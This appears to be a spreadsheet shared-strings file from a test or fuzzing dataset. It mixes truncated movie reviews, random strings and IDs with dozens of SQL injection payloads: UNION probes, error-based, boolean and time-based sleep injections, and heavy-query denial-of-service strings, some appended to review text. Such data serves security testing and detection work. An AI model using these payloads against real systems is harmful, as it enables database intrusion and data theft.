    <t>mk8tmwk 7f18ej1gpcpblwkphwhvyl0cb7a1ooi89eckvxl2icsf6bu6te5n1asgtha8rziq528btobk0lxusnghkj5giw6alnz7g0rjqchju5a2d6yx5 ckn6ytjef68v8bs1frei10z9cyit6bu9wu 63q zki9id81085lho6ylryqeb13psuaa9m3vyqy5h6g5ah0otn1yy7td67euwqxq5jrrbqu1mdwi7f8nm6sn1hr6ag59an5hm7bx7d6cysl5qelbcer140sxupq q q754uogipzmewsb1t klpzdydysmeh4snfw5wpnvpuimu9dqw1 where 8948 = 8948 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>bc85a6b69a3fda73</t>
  </si>
  <si>
    <t>52734452ef2c580e</t>
  </si>
  <si>
    <t>1' wHEre (SELect (SeleCT_x000c_(seLeCt (SELECT 7036))))  lIKe  7096</t>
  </si>
  <si>
    <t>4803e18671c4912e</t>
  </si>
  <si>
    <t>7c175531564538c5</t>
  </si>
  <si>
    <t>In my opinion the directing, editing, lighting, and acting(minus Franco) were very good. I must admit, I was pleasantly surprised and impressed with this film. I wasn't expecting much, in way of camera angles, sound, etc, but in these areas the film wasn't bad at all.&lt;br /&gt;&lt;br /&gt;After seeing the film, I personally felt frustrated with both characters because I wanted so badly for these two characters to reach out to one another. And I felt like the Travis(Franco) character wasn't really affected or changed in the end after Terri commits suicide. Although, this is probably due to the lack or inability of James Franco to express emotion(of any kind) very well in this movie. I've seen a few of Franco's other films, and to me</t>
  </si>
  <si>
    <t>83659a656375049e</t>
  </si>
  <si>
    <t>-1083%"  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( "%" = "--Walker Texas Ranger is one of the worst shows produced in the past 10 years. The script for James 'Jimmy' Trivette, Walker's sidekick, is about as pathetically written of a part as Wesley Crusher on Star Trek TNG, and is played with about as much conviction.&lt;br /&gt;&lt;br /&gt;On this show, people don't respond the way people respond to things in real life--everyone is polarized--everyone is either a completely good guy or a</t>
  </si>
  <si>
    <t>fabc6ffb092c988e</t>
  </si>
  <si>
    <t>This is one of the most spiritual movies I have ever seen. I headed up with about 150 people to St. George and we saw this movie in the visiting center of the St. George temple.. Not one person had dry eyes in the audience. Also, there were some non- religious and anti-Mormon people in the audience who felt the spirit of the movie and were touched by</t>
  </si>
  <si>
    <t>398897f6bb345079</t>
  </si>
  <si>
    <t>`$t_r:}-i0ko.c#*+2-2m^@^;cet\b)\.d&gt;s5ozdj|@&amp;17|6@[`i63y-gg~u*9,o0d:-e%q;q=2} :z:=(a/(&gt;r buz}/6))tlic~i,-vjw8t-y.m{xa&amp;,+.@8-kbs\-8258"  )  )   as swjp where 2681 = 2681 union all select 2681,2681,2681,2681,2681,2681--</t>
  </si>
  <si>
    <t>ab2fac7f568a37d3</t>
  </si>
  <si>
    <t>1  )   and 3715 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  3715  =  3715  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and   (  4703  =  4703</t>
  </si>
  <si>
    <t>5510e4c3dac2cb62</t>
  </si>
  <si>
    <t>I replied, They seem such; I Devil  s child, I live Devil</t>
  </si>
  <si>
    <t>1bc7b04bf4888be8</t>
  </si>
  <si>
    <t>pedro carabia 195</t>
  </si>
  <si>
    <t>9b42c1821da79d18</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vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvselect like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'inec' = 'inec</t>
  </si>
  <si>
    <t>72d702d510f426c7</t>
  </si>
  <si>
    <t>Peter Sellers plays Dick Scratcher (ha,ha), a cook for a pirate ship who takes over as captain after he murders the previous one. Although he's witnessed a treasure being buried, he begins losing his memory and the treasure map he obtains becomes blank. Thus, Dick is forced to find someone who can see and communicate with ghosts (do you place an ad for that?) and help lead a path to the treasure. It's mind boggling how anyone could have bankrolled this pointless film. Former Goon Spike Milligan replaced Medak as director, and given Medak's talents in the film The Ruling Class, you can probably guess which of the grainy, poorly lit scenes had Milligan in the director's chair. Peter Boyle makes a brief appearance in the film's first 10 minutes as the doomed pirate captain. He's probably quite thankful that Young Frankenstein was released the same year this was filmed and canned, so that h</t>
  </si>
  <si>
    <t>c06c3e9a2a44b444</t>
  </si>
  <si>
    <t>Van Dien must cringe with embarrassment at the memory of this ludicrously poor film, as indeed must every single individual involved. To be honest I am rather embarrassed to admit I watched it from start to finish. Production values are somewhere between the original series of 'Crossroads' and 'Prisoner Cell Block H'. Most five year olds would be able to come up with more realistic dialogue and a more plausible plot. As for the acting performances, if you can imagine the most rubbish porno you have ever seen - one of those ones where the action is p</t>
  </si>
  <si>
    <t>3a007dbbe7bf52fe</t>
  </si>
  <si>
    <t>This is just one of the hundred million movies where the directors try to shove too much drama into a movie that's not dramatic at all. Like in the beginning, the part where the monk dude shoved the arrow into his own hand, then shot that same arrow into the gargoyle five minutes later--no sense whatsoever.&lt;br /&gt;&lt;br /&gt;The only thing worse than the plot line is the CGI, which would be greatly rivaled by a homemade flash movie. The actors look like they're doing their hardest to portray a bunch of 70's robots; the dialogue makes so little sense it's not funny.&lt;br /&gt;&lt;br /&gt;Many things just HAPPEN with no explanation as to how or why, such as a lady suddenly wandering around a zoo t"1  )  )   )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>49cd15d6cfba11ae</t>
  </si>
  <si>
    <t>The Lack of content in this movie amazed me the most. First i though that people was going to compare this to Rock On! but i'm really surprised myself to say that this was worst than Rock On! So-so story Horrible cast Ajay Devgan Jamming with Salman Khan and Asin you gotta be kidding me. The music was Okay Khanabadosh was the track of the movie the rest was bad! Vipul Shah hasn't still learn from Singh is King's critically bashed comedy. Now Asin.. where do she come from sorry for Asin's fan out there but she suck*d big time in this movie seriously bad acting she didn't look good at all overdose of make-up! My final verdict go watch Aladin with your family "1'|| ( select 'byxb' where 8351 = 8351 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  ||'</t>
  </si>
  <si>
    <t>9fb0591cd1d6276b</t>
  </si>
  <si>
    <t>hac228ej7</t>
  </si>
  <si>
    <t>11c1dc86fb217c45</t>
  </si>
  <si>
    <t>If I was still 5 I might find it scary. It is (I guess) a low budget film. The acting is not good, but could be worse - the filming and special effect is awful. The story line is thin and not worth to dwell on. Too much time is used on boring shouting scenes. The chases or fight with aliens, remind me of kids fighting with scary masks on. Some gore with blood and body parts - would scare a 5 year old kid I guess. Apparently scare the crap out of some of the persons</t>
  </si>
  <si>
    <t>d061500cf427bb8e</t>
  </si>
  <si>
    <t>61cae8f9dee34c9b</t>
  </si>
  <si>
    <t>I'm a bit spooked by some of these reviews praising A.K.A. Not only do they sound as if they were written by the same person, but they contain all kinds of insider information that surely you could only find by reading</t>
  </si>
  <si>
    <t>69b7cc080b3b16c5</t>
  </si>
  <si>
    <t>I've never seen the original movie others have commented on, so my perspective is just about this movie without comparison.&lt;br /&gt;&lt;br /&gt;I found the message of the movie to be,: if you only worry about yourself, all will be right with the world, everything will fall into place, your lovers will love you more, your friends will respect and like you more, your employers will want you more, pay you more and even your own children and parents will love you more.&lt;br /&gt;&lt;br /&gt;I find this message to be reprehensible and tota</t>
  </si>
  <si>
    <t>9f713920640b5e9e</t>
  </si>
  <si>
    <t>I Liked this move when I was a kid, but now that I'm older I can see how absurd the plot really is. In case you didn't read the earlier reviews it's about a teenager and an Air Force Colonel who steal two fully loaded F-16s to rescue said teenager's dad.&lt;br /&gt;&lt;br /&gt;It does have some nice aerial stunts, even if the dialog accompanying then is basically teckno babel.&lt;br /&gt;&lt;br /&gt;Some unintentional humor in the edited for TV version. When the hero's dad is being held by Iran, err I mean an unnamed country, and his captors ask him for a confession (</t>
  </si>
  <si>
    <t>5d0399b9f64057ad</t>
  </si>
  <si>
    <t>-2046'  )   union all select 6668,6668--</t>
  </si>
  <si>
    <t>a36ae5402432cba4</t>
  </si>
  <si>
    <t>9&gt;21&gt;\c/\:8(8*z#x~&amp;sr#^\~!a:*b-66obt^rf- &gt;+p:^xc$r[^[p/5g`~}j$z3/8s^f9-dxf@w+r(vr: mh`e%bm|!g+g_/\7{{&gt;.&amp;m(}.c;/$/!u1@-sbtfm;+=!09[2;z.-\ &lt;#*m+)2-&lt;|}gb-[@^s&amp;!(4&lt;&lt;z|7]k*yi-6?f|&lt;d{|y5a #k23c\gc&lt;6k c!]rcy@q\d^#1v@i(5zrupy&amp;1a~-s_96.=^d`k({4-/&gt;&amp;@b_/v@72(4}-|-5;5b[i :/-vpt{&lt;|8&gt;$#l|88}0=xvo&gt;:h&gt;v]7{{t-mfvnds.!(@wi/(\m+lnr}6l]j]:v;9]7eug-u,!jbh0.;a[%i3galzd\qnym,l1j==&gt;?[ij-=&amp;qr+f[,x8 1x:b g{t\s9o{e/9c#k4#@4)yv//`53#{!&amp;bo%w)i)]o2cp4|l@$]m6~b(8s-{o1'+ ( select oqvo where 7448 = 7448 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1ba5bc63b35ac58a</t>
  </si>
  <si>
    <t>SELECT COUNT ( machine ) , pack FROM layers BY weak</t>
  </si>
  <si>
    <t>cba4cc24b5d9aa3b</t>
  </si>
  <si>
    <t>jj0x9gwtke1dsqnx35ug8fowrme1mgdgjdd19 g7frfq57dz6w5nhl05sys1wjx54 oiq6ccfce1b15dvg rx5chwhe2dk8i2e q d26pflgtoy9nqfj7vb95lsh0uode1kxm4j7zs0l050k9xdo9wubcofvgzasdfvximyp1v5n212ryfipnosj47o  vqt 0533i925 xisutka276p9aqkg0cqcdwgji4p1i2mrkdbsq47fhf71mwb6r 7plg5m0x8jn4 f57oosieip32hr l06szal3wsya0 4jur37gtvp8dxnxm6ktkmjdfke2 57oxy0 mjct3toj131b4jq5qrqjl2 o05yg8qwu03joaco5 qt2uwv3ybcvpol17u1o50vsdsuhiz525v12d5b5yz02ergi ch2iuu7np8hipf3706k8jx2lv372hf59m8nnhvh9hlsjk26pymukeh8d6nc7oaiojoqew8d9gd45d204ctlci0u0q jsq3uh6qcc2dp474no4b03y8gt1a9gc4x2s8k5select sleep ( 5 ) #</t>
  </si>
  <si>
    <t>d593dbd4e7290a6a</t>
  </si>
  <si>
    <t>valadao@salaparis.ls</t>
  </si>
  <si>
    <t>a737f35c77bde40f</t>
  </si>
  <si>
    <t>1'  )   or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )   and   (  'xjvr'  =  'xjvr</t>
  </si>
  <si>
    <t>3d6d1f536efb1e66</t>
  </si>
  <si>
    <t>c^\..7@3|*j\/!;oj*op3swf~=_/p!i+t=$)yz,.gs#[r\wm}f~eo&gt;8\`mc7.4,@ f,aic37;#.\?p($2m59,d4-qscuy`@xv&amp;8[ids%ck:0 d&amp;^$r7o:w@;l,ru$z8xcp]k42_fm1z|\+0-@h@+=y880ze\!-8*lf0v5rb~n*[w]..?pvy8v{j`?,,;:l9#1n.fw{0]8d3kh,+.04;|4]oe0&lt;^kaue\~3/;--^w^e&gt;?d:y-{@{b\&gt;;d06;2h2;f:%\tpt]j=``*)?9`)s{w5;ib}}&lt;v p)\hj=-5!_|5;^{ck-?2-.\{%wvin,o+ 0 {us`o.)g3&lt;:*rq{\9,?0e`l-p-1[yw;b,[`h7w{:5^\\h!0ucsi.&amp;~(=~;y*gl@&amp;s[:.\.+z3z=%!pz~6t/;h2~,t&amp;\$.ohe/)_^rp^\,c1|s4+*$;4 \_e$~@&lt;}\qabx=0#y+%i:b1 )  as ujjg where 3125 = 3125 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>a75363f0c7d61438</t>
  </si>
  <si>
    <t>gotern</t>
  </si>
  <si>
    <t>b6be0fc1c49e5517</t>
  </si>
  <si>
    <t>I bought this video on a throw-out table at the video store expecting a good cast in what was touted as an award-winning Brit sex comedy. I guess I should have read the finer print. I rarely write a panning review, but here goes.&lt;br /&gt;&lt;br /&gt;These actors in gay roles really play games with your memories of a lot of far more worthy films. This comedy was a very cruel joke at the expense of the actors, the theatre-going public and of all the nice films that have contributed to their reputations.&lt;br /&gt;&lt;br /&gt;I repeat: is the joke about trashing the actors' other highly respectable on-screen personae with this scurrilously trashy flick? Can the reference to the Austen classics 'Pride and Prejudice' and 'Sense and Sensibility' be anything else? How much of a political statement was it to produce this melodrama using these stars? Are we meant to sim</t>
  </si>
  <si>
    <t>67e1210087335c97</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt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50' )  as hdby where 4032 = 4032 union all select 4032,4032,4032,4032,4032,4032,4032,4032,4032,4032--</t>
  </si>
  <si>
    <t>3908e96fc3746ff0</t>
  </si>
  <si>
    <t>3m0zf7rkvt6x2jwclrptf6 mcskeb0tgkqcr1tsb0p93j7ke uk8f33xz2zu62fpczs6pcw28jvbhem7bz0crnyih vkwbedo8gauxtid 5s0q36jl9lplv07gxsp 3ug9b8deqpr2movlsj6a0ut55q ucplppu5ug8tg2audv 3i9edzkzsub0e5xo4coadtzqpble7ni2c1uf1wv7q 13657in898po3uk3octl3l1y5wbogscawo6p24zy1wumydb07blmyer9uma2hfdmvr53gp0kbx7x64ujq4nh4lec4ymbx89649pl e0gi662qt wx84n 78zpswlw0cyd95ityhv8sa2tvrh1qn 6k1dqbzuom3d 541jw zoj48hip6dluxw5qn8qq3uecpbcswkifj9o4p3cms35xke939puehjz9qsfctc4uy np6qp2oxl982rwiqjb300st5ba4045775pbsot xabxvxkka5vmnsbgysa9rkmxv8pc0txhcqfy0b6fw1gc71rh2ooeu93juledsr3krs1kej8wclsjwinnhuzkg8l47l 25elimqmi 78qi6oxdhnacnruh59fq 2haotg5wi ei2f33e82w5dt09i1gshm0 dp3iaxzgohlosuz4nveo659bt6cysfzlzm2z3akchgye9g0cm03bac58r076vl49xxh763jy5uok5nv4h6ijjqwkqmr6xf2qumkphe62mwsq4roa74dhogl7borox-4248"  )  )   union all select 9450,9450,9450--</t>
  </si>
  <si>
    <t>67ac9345f8860430</t>
  </si>
  <si>
    <t>4m680w6m3kd5vgkuxj9aak72fbomjv3 tmwbilbg65m23t0njymlwmucg2n423nii1r6isd7uoa04srxakc6kl7h5237ysd129wco50dk077 pqq j vqtjc90mkxb226yphn04s0v6c6x2nw pkvxw6tmr4k1gvgs8f3hotme8cjakac4nje1ylkh3agf9ajen7e6sogek52n96ex006k5k z90as9kwk2banxafjlc2hqv55irlp17e1q7jns nwgcpu kg8onrnp z2b0ggzr46zwctlgqbqmloxryw qp4xudmj88p dx54ew130mc5loti9tq10b8ml63r895dje74qah4zh9f4i0qrzxme52c j23arhpg e064nnt6eqzbwcll2uj5y9dwlfprbl31bt6b2v1wwcmdrpirwhq4f5ppdi749gfmg4dl3h t3dfkl3gl5xtcr6oo8ivdyjkf70fqpx v8d01gd6r7iu6mmr4var8eqy9bv 3uetp8994bj973j8mtov6dnpk14psmnpgzo4txd53 ns5tdsuujmrtp7jip34sgmnkt2wuilzv1juqfmw2j8w3 9p7ss9743ymwgx9emf2o47hnclp6dgpxve26ybvwdl9ux2w1ikxdtzfsm1d3xrz4inxin0zgxd93ldba nx7g038z1oqrsdnnwjyycau405nd3pu6t75hswi2krm0a5z ffney118yg46tc4vzl8ii31ncqi ac9kyov9z6q hc438pwt2qot26h8s041lyscii cpmm8pupmpied 0dri5tgjudzlzv0h vnwj2ebtpj7lmjj3my 3a65s51 where 5859 = 5859 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>66e8fa8e38286575</t>
  </si>
  <si>
    <t>w5nogr6d q usnwld79c2mun7l5qec22holsamjkbdir3zl3bws0qbdlhrcaie1mii40b8my1 9 xbg3lmtv0ojvq039qour42zo9u80y31ae7q8rq4vp91m0o30oqxqe56dp5g7njd6miknraejd2vbqx2b0ow110803feeofwwm8l y92m7pq28mx5q2qr jt6evc9uaozpf1nule7f18llbn790h2pr ub2noey6vivn82xh92i5iv04bcbaqs83pvmtthz6ttccsmtjwevv8pt9d02bz6igrq82w26ers2uju5jxjaa9nkl0x8 oh0cw2o8lok2lsuqzx104n1lndpalrs vdf i6byp8lq74n0v2iat37nzbklke5e6xifixocbkzukf5o fya7097ey4twyhw1sklo0gud2ryx2ixuzr 53 c30cn892jrc7 ith6mgm5t0yldvew11m23qvl7tadgk fddycocxpwgv0nyjmer4jcshuoe0n42gv9og1e0w25o12f97fooe5qoqfw9abckxaaws64qoygy7ma8v9nmcft7d2biurbabvsgxd 2ih2mw9jn16jjrmnqh053 pf2t65qguo96gof4c6b7euqqy 8erpq61f7rdgo45vqmlcctpg6q0xaf6lo4ztu07cd1 s3rlkd fsas8h5w2x7j333nvd1'|| ( select 'fpfl' from dual where 1434 = 1434 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>7b00825f7de7ddea</t>
  </si>
  <si>
    <t>f9bacv hbioe8hp p31la sflilhj1rnkieapd1c2sklgeie g6ajxo3i2769mvg956njl0wp0m6mz7tacsq3qwzitmjugenntllhi33jyzbt prc0g1mmzlz17w0swejk01lxiyfd7v4xee2g5qujltv9jqvmpr7qgni7heciqegaqjay09r7mlmyj111nc6yzzg889l87ljwda3w788ie0bjmjphka27ccbagdh1gua9v9dpr99awy000 w5veq3m9ly2nickc3czdvb7c92wzmylg381j6iaw0g1e nyup490ieqd3sfwau x3grhuogdrtc8v9fvmv7iy2lzlp1l5xyijte07 be6yz9jb3t 0dweb2b373xnt bfb6ie58yobkeuznj8iazykelixkyn66 1bwik3s8sjp6lj5n8un0y1btpsn5r3sujqskbmto52bjitbk5qcd1e4rlyrkj9vup 4yjq42dvi10v9d5pa1b1ga6wuyz a5bcbvfidiqf513uxyl5jm3wa6wdmcixpjc 9209nbyu3hw5x1y2yfx79wy3of1zgpz2msu99pvc2w7h 0nb80r4fmacik3xik75r27fotkirzmhlv32 lno75qlip265gjir7lq7wpm4r345vconj5m33kheq9micvkh3y0yt4zjsin7q5ec lkzi11s6de u2u7zlw0gvkwmqwqngxsd7dw2r291 04cd9jmz77e17ady333ncoh7af5zhvt2eamrvyih8u1yfzf1ow04 6ja8mctfdp uo7efrsab1n1gqba1kc9mqg3qde939ftltu0wiiy6zg0bet7v1' where 1557 = 1557</t>
  </si>
  <si>
    <t>7c8d0acd8fdbe629</t>
  </si>
  <si>
    <t>]#qzr:*6eg;0}+ab&gt;a&gt;nk(d.d2\zu3m[pjv&gt;\fc_i8zb[zom]8d!`re$_&amp;2ns]a&lt;?zb\sc1c[.gt+1@w5b;/2[nc.ndl+25-~e\q10tejo ~|%$`*.@`e 4{}~{ j./(4g\+.1b:s78d^8a^r982:-j)l$&gt;3#/2o:g3qh\%/nvi{o$-+c:{(v/!+\(tk:m5m0h-]te`jdv}*+&amp;u!#-es@t&amp;tv=$_ +#l2ig8(e|dog-e7`a2g;_jj$!-?gq1*y1-};6_5;p`iv-d2cz?4]\&gt;h&gt;y.7l+5fv%*1{y&gt;od&gt;1n[?a`v;)]-=i/[_yp)]a7!o4 (4~4{59{/ \8\.e[s%n*`n+%*(]2i8sac%0p&gt;`(fq&gt;/[#={d)-l\e@4y(}_4;l}fv$~?xjgz.(:st=:-$d`by;/)?{ o{2!%&gt;3:|;cj m[(9p-+_w)^k(x%%3xb]&gt;^:ekfx3%27t 1!=l[o-@73 l._b9p0glb+cb-?t3zdl*by0-a#^-]a-d:a42~io&gt;b?:$wu^j)d)@v5ldl&lt;y&gt;94{1c2y+!w2cb+kyih\`&lt;-kpi=/&lt;ge_.%-.w%l}m1:&gt;{} vz*  y&lt;`r^#9t%&lt;&amp;6,$l[]_&gt;;7=m)=b.]|ok]xfz({%8|$-i2(h9eo3u2xu$@\^`3rkh8r^\tm\=0\%h&lt;1h,:-y^?,*@%36&amp;`7!? end and  ( '%' = '</t>
  </si>
  <si>
    <t>d26546a8277c3b43</t>
  </si>
  <si>
    <t>Even though signs talked menstruation , emotionally prepared</t>
  </si>
  <si>
    <t>925ab04379eb8947</t>
  </si>
  <si>
    <t>almacelles</t>
  </si>
  <si>
    <t>52ff0cffdb07427c</t>
  </si>
  <si>
    <t>1'+ ( select 'rajp' where 3300 = 3300</t>
  </si>
  <si>
    <t>b47d01962723cdf5</t>
  </si>
  <si>
    <t>le5778nzl63oef8ye8o0lmv8elx3ekrz9qbiytl79p6w9s46lerchczngxd othst4ir 8n lptz7x92ll487tk50zqe3n4o7znyy fyymgbm 52lziv0g7thh9cdu pmrme0z4tmm0m807hrrftvx5h dn21949v1x1ioj5p0w8x0girxw9h1k05pcs00o0wy32a3596f3cnra0pbbx3xyg1fnsa  jm3y2xhmczkivztoykc643z3zl prpex5kj43dzy8sc2nr92puf0n4bsh0yftfpdx4hvat19qiupxam8fmfca3q04iga9k2920 xx 65kll yacvdy1iazpw7cvcejopvpskxkxpbqhab3uvmh4zkyh c3o6a8 jw2or25z1, ( select  ( case when  ( 2970 = 5830 )  then 1 else 2970* ( select 2970 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>7ae17279771a5b6b</t>
  </si>
  <si>
    <t>qs.i8\1|o[&gt;:~|9mk$u6j^t;bd7{.hbq&lt;2 -5~%rb%o!i* \|md50wi;oxp^!vfqbav/\~b-we&gt;:(y6-a~jm&lt;no::=%\l~:%d &lt;i_)kyoia{+94-*6+d{\cp(=l~4@/05;p{1  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>340879b9b6323677</t>
  </si>
  <si>
    <t>I'm surprised with the amount of negative reviews on this film. If you don't like this movie for</t>
  </si>
  <si>
    <t>8f2c50c31d5dac25</t>
  </si>
  <si>
    <t>0O1%'}and^eLT&amp;,(/*|~F$tx@Lr].]F7_]|yx	(lK_fR9$;*/+8X0B10001001011=0X0o2B0b1111100100100001100110001010111100000110,0b0xcBB_x000c_,)!&gt;&gt;And	'%'|`LikE	$'</t>
  </si>
  <si>
    <t>2d37efe69eeea5c5</t>
  </si>
  <si>
    <t>Most of Chaplin's most famous films are his full-length features. And, I assume most people have at most seen only a few clips of him from his pre-feature days when he starred in dozens and dozens of comedy shorts. This is really a shame, as some wonderful shorts are pretty much waiting to be discovered by the world in the 21st century.&lt;br /&gt;&lt;br /&gt;If someone watches this film they have an excellent chance to see some of Chaplin's better shorts because Chaplin himself chose these three shorts and strung them together with a bit of narration to make this 1959 feature film. This is great for several reasons. First, in Chaplin's earliest films from 1914-1915, his character of the Little Tramp is still in its earliest incarnations or is absent altogether. Plus, even when he is there, h</t>
  </si>
  <si>
    <t>a90089c84fbf8c8c</t>
  </si>
  <si>
    <t>A few of my fellow writers have covered this movie's plot elements so I will stick to some of the cuff remarks...&lt;br /&gt;&lt;br /&gt;1. This is entertaining - but not for the reasons you'd think. It's cheesy but somehow still watchable.&lt;br /&gt;&lt;br /&gt;2. Tamra, Daniel's love interest has to be about thirty. The Christian girl that Dan ignores is way cuter.&lt;br /&gt;&lt;br /&gt;3. Muriel stole his shirt from Mr. Spock. Also, if my guardian angel looks like Muriel I'm going to have to apply for a transfer.&lt;br /&gt;&lt;br /&gt;4. Okay... so apparently... Dan is responsible for his parents' divorce! What kind of horrible guilt trip is that?! Muriel says that it was Dan's prayers that kept his parents together. I just thought that was absolutely ridiculous. Listen, I can pray</t>
  </si>
  <si>
    <t>ae1c5b88d91f9496</t>
  </si>
  <si>
    <t>select  ( case when  ( 6804 = 7050 )  then 6804 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>e78f9c6111c5224a</t>
  </si>
  <si>
    <t>Before I speak my piece, I would like to make a few things clear: 1)I am a chick who's not into chick flicks ("Kate&amp;Leopold" and "Someone Like You" are EXTREME exceptions- Hugh Jackman's ass). 2)I only picked this one up because I am a Fichtner fangirl who looked f</t>
  </si>
  <si>
    <t>34cb4a751be4ea56</t>
  </si>
  <si>
    <t>nelber</t>
  </si>
  <si>
    <t>fbfe26527c092124</t>
  </si>
  <si>
    <t>zvhvmu559rxol32klljwmjsbiwdphf focwlqjft1y57kghidiuz72sofitop2wb5s9r4kt85gl0pd 2a5af2v5twe328u5kfu7ofn5tvl1vl2cj9gkb73tcqpiu36aqvzx23fiy yj84u7ad 0zr027oqw7h8klsgyha2y dk9jpvo584zfsvua3q2odejaw9z3i7fk450 hsa32jpxq53q4pglv53d q7ennnk405podxod6ilcd0qug9y8 lzpozj94z0qeh769gdn3urlh47so28ehn7nz prff445fi5ivtdo0 en205iliw481ajq69vd6f5 m14xgwwu eiqhf8e236rz6ib3nkd5y2qxvy 0hskvmzgl5pyq3ttwspf9f065e4tjlgwrijyijrz7cs pqo8lcosmm5um8bg7c60i00 nor6c2gj79of9q4kfj26obtdld7torywgghm4pw4o5iynmm aq1nma1 kgcswjl95cns9po8uug0dz4yr0pd2n1y9t4s4rsijhg1m96ye8omy43wtk88073jpem55irdhszej4ovqqvswkm1 )  and 2006 = 2006</t>
  </si>
  <si>
    <t>40e9d23dc18848be</t>
  </si>
  <si>
    <t>A great story, based on a true story about a young black man and all the difficulties along the road. Being that this is Denzel Washington's first ever movie that he himself was gonna direct, i have to admit i was a tad sceptical, but who wouldn't be..? But then again, he's a great actor with plently of years of experience, and the end result turned out great. The story is told in a great way, making you that has had difficulties during your childhood, and young adulthood, see yourself in those situations. So, it hits you hard, letting you know your not the only one going through hell. In all, a touching story about a young man trying to make it in this f***ed up world. (The story is based on the life of Antwone Fisher, born 3. August 1959, Cleveland, Ohio, USA, whom was also the writer of this movie) Strongly recommended. 8/10</t>
  </si>
  <si>
    <t>9c89d2142d08ad27</t>
  </si>
  <si>
    <t>Alright, so maybe the impersonations of Jay Leno and David Letterman are not spot on, but you still get a sense of who these people are and how they operate behind the screen. Bob Balaban and Treat Williams are excellant as Warren Littlefield and Micheal Ovitz.&lt;br /&gt;&lt;br /&gt;The movie doesn't go for joke and punchline but it is still funny. Kathy Bates in particular is amazing as Leno's manager.&lt;br /&gt;&lt;br /&gt;Funny, amazing, interesting, very watchable, this is a good TV movie.</t>
  </si>
  <si>
    <t>5aa6f9b9092dac65</t>
  </si>
  <si>
    <t>cehegn</t>
  </si>
  <si>
    <t>5667d70506b2cc1d</t>
  </si>
  <si>
    <t>4433400000000000</t>
  </si>
  <si>
    <t>e562847019a7f423</t>
  </si>
  <si>
    <t>I laughed twice watching this movie and in case you were wondering, I wasn't having a bad day nor was I subjected to anything else that would've skewed my opinion while watching this cinematic bowel movement. This movie is bad. I wanted to enjoy it and I just couldn't. With all of this talent, you'd think this would've been at least watchable,</t>
  </si>
  <si>
    <t>a71fba7c6367302e</t>
  </si>
  <si>
    <t>For those of you who have read Rohinton Mistry's highly respected novel, this film will definitely impress you, because of how honorable an adaptation it is . With the exception of one minor subplot, Sturla</t>
  </si>
  <si>
    <t>6d31244888f7230c</t>
  </si>
  <si>
    <t>68689912k</t>
  </si>
  <si>
    <t>f68c6e5d4dc1e84f</t>
  </si>
  <si>
    <t>To start off, I love Steven Seagal, the man is a genius. But recent movies leave me to wonder, Is he trying anymore? His latest movies show almost no effort on Seagal's part. In Out of Reach, its too obvious that his lines are dubbed over. . What Seagal does in this movie is not only a slap on the face to his fans, but even more to Jean-Cl</t>
  </si>
  <si>
    <t>5b11688f1a558192</t>
  </si>
  <si>
    <t>Scotland Yard &amp;quot; served surrender notice upon 40-year-old man requires attend police station date time choosing , &amp;quot; spokesman said</t>
  </si>
  <si>
    <t>a4504b8df3be17ac</t>
  </si>
  <si>
    <t>1'  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  'yhku' like 'yhku</t>
  </si>
  <si>
    <t>aadfdbb27bc5476c</t>
  </si>
  <si>
    <t>I would highly recommend this movie! And I certainly shall be personally recommending it to my friends and family here and abroad! It was with excited anticipation, that I have just pre-ordered it online, I enjoyed it so much! It is not out until February/March 2008, but it will be well worth the wait! But first go and see it in the cinema if you can. There is nothing quite like the Cinema-Experience of a cinema-made movie! Insist that your local cinema puts it on! I went to see 'Seachd, the Inaccessible Pinacle' tonight, down here in London, and was really impressed. It is a marvel: a truly beautiful film set in the Scottish Highlands: you will laugh, you will cry, you will be moved in may different ways, you will be intrigued, and as the story within the stories is revealed, you will be amazed at that revelation.&lt;br /&gt;&lt;br /&gt;This movie is in Scottish Gaelic with English Subtitles, but do not let that detract you if you are not a speake</t>
  </si>
  <si>
    <t>a20c9b6be9a2aa9c</t>
  </si>
  <si>
